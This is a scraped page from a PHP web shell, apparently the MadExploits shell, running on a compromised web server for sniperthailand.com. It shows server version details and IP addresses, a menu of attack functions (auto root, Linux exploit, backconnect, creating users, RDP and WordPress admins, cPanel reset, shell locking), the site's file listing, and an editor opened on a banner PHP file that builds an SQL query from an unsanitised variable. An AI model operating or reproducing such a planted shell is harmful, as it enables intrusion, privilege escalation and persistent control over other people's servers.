Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.137.182.21
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
sniperthailand.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets2
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
lasery
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.htaccess
1.2
KB
-rw-r--r--
0language.php
1.91
KB
-rwxr-xr-x
1Head.php
20.57
KB
-rwxr-xr-x
2HeadMenu.php
14.78
KB
-rwxr-xr-x
2banner.php
4.68
KB
-rwxr-xr-x
3Footer.php
10.82
KB
-rwxr-xr-x
4End.php
5.74
KB
-rwxr-xr-x
about.php
12.83
KB
-rw-r--r--
contact.php
6.64
KB
-rwxr-xr-x
detail.php
11.99
KB
-rwxr-xr-x
download.php
9.8
KB
-rwxr-xr-x
index.php
173
B
-rwxr-xr-x
news-details.php
5.92
KB
-rwxr-xr-x
news.php
5.83
KB
-rwxr-xr-x
product.php
16.06
KB
-rwxr-xr-x
product_category.php
8.7
KB
-rwxr-xr-x
product_category3.php
14.71
KB
-rwxr-xr-x
product_category4.php
5.26
KB
-rwxr-xr-x
product_contact.php
1.87
KB
-rwxr-xr-x
product_detail.php
24.13
KB
-rwxr-xr-x
product_detail_More_products.p...
7.61
KB
-rwxr-xr-x
product_left_cat.php
7.23
KB
-rwxr-xr-x
search.php
4.3
KB
-rwxr-xr-x
service.php
3.8
KB
-rwxr-xr-x
topic-product.php
1.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2banner.php
<div class="clearfix"></div> <section id="bonslider"> <ul class="owl-carousel-bonslider owl-carousel owl-theme owl-loaded owl-drag"> <?PHP $CategoryContent_ID = 25; $CategoryContentLanguage_ID = 94; include 'Structure/Structure_Content_Loop.php'; while ($objResult_content = mysqli_fetch_array($objQuery_content)) { $ContentID = $objResult_content["Content_ID"]; $ContentName = $objResult_content["Content_Name"]; $ContentContent1 = $objResult_content["Content_Content1"]; $ContentContent2 = $objResult_content["Content_Content2"]; $ContentContent3 = $objResult_content["Content_Content3"]; $ContentContent4 = $objResult_content["Content_Content4"]; $ContentContent5 = $objResult_content["Content_Content5"]; $ContentNumber = $objResult_content["Content_Number"]; $ContentDate = $objResult_content["Content_Date"]; $ContentTime = $objResult_content["Content_Time"]; include 'Structure/Structure_Content_check.php'; if ($ContentNumber == "0") { $SQL_Content_Img = " SELECT ContentImg_ID , Content_ID, ContentImg_Name , ContentImg_Sort FROM content_img WHERE Content_ID = $ContentID ORDER BY ContentImg_Sort ASC "; $objQuery_Content_Img = $objConnect->query($SQL_Content_Img); while ($objResult_Content_Img = mysqli_fetch_array($objQuery_Content_Img)) { $CIMG_ContentImgName = $objResult_Content_Img["ContentImg_Name"]; ?> <li> <div class="bonslider-background" style="background-image: url('img/bg.1.1.png');"> </div> <a class="link-bonslider" href="." title="<?= $ContentContent1; ?>"> <img class="img-responsive" src="model/upload/img/IMG_Home/<?= $CIMG_ContentImgName; ?>" alt="<?= $ContentContent1; ?>" style="opacity: 0;" /> <section class="box-bonslider"> <div class="container"> <div class="bonslider-caption col-xs-12 col-sm-6 col-md-6 col-lg-6"> <p class="text-banner-size"><strong><?= $ContentContent1; ?><br /></strong></p> <br> <?= $ContentContent3; ?> </div> </div> </section> </a> </li> <?PHP } ?> <?PHP } else if ($ContentNumber == "1") { ?> <li> <div class="bonslider-background" style="background-image: url('img/bg.1.1.png');"> </div> <div class="container"> <div class="bonslider-caption col-xs-12 col-sm-6 col-md-6 col-lg-6"> <div class="item-video" data-merge="1"> <!-- <iframe width="100%" height="100%" src="https://www.youtube.com/embed/v-6XIbr8qPY?autoplay=1&mute=1" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> --> <?= $ContentContent2; ?> </div> </div> </div> </li> <?PHP } ?> <?PHP } ?> </ul> </section> <style> /* Extra small devices (phones, 600px and down) */ @media only screen and (max-width: 600px) { .text-banner-size { font-size: 16px; } } /* Small devices (portrait tablets and large phones, 600px and up) */ @media only screen and (min-width: 600px) { .text-banner-size { font-size: 16px; } } /* Medium devices (landscape tablets, 768px and up) */ @media only screen and (min-width: 768px) { .text-banner-size { font-size: 25px; } } /* Large devices (laptops/desktops, 992px and up) */ @media only screen and (min-width: 992px) { .text-banner-size { font-size: 25px; } } /* Extra large devices (large laptops and desktops, 1200px and up) */ @media only screen and (min-width: 1200px) { .text-banner-size { font-size: 30px; } } </style>
Close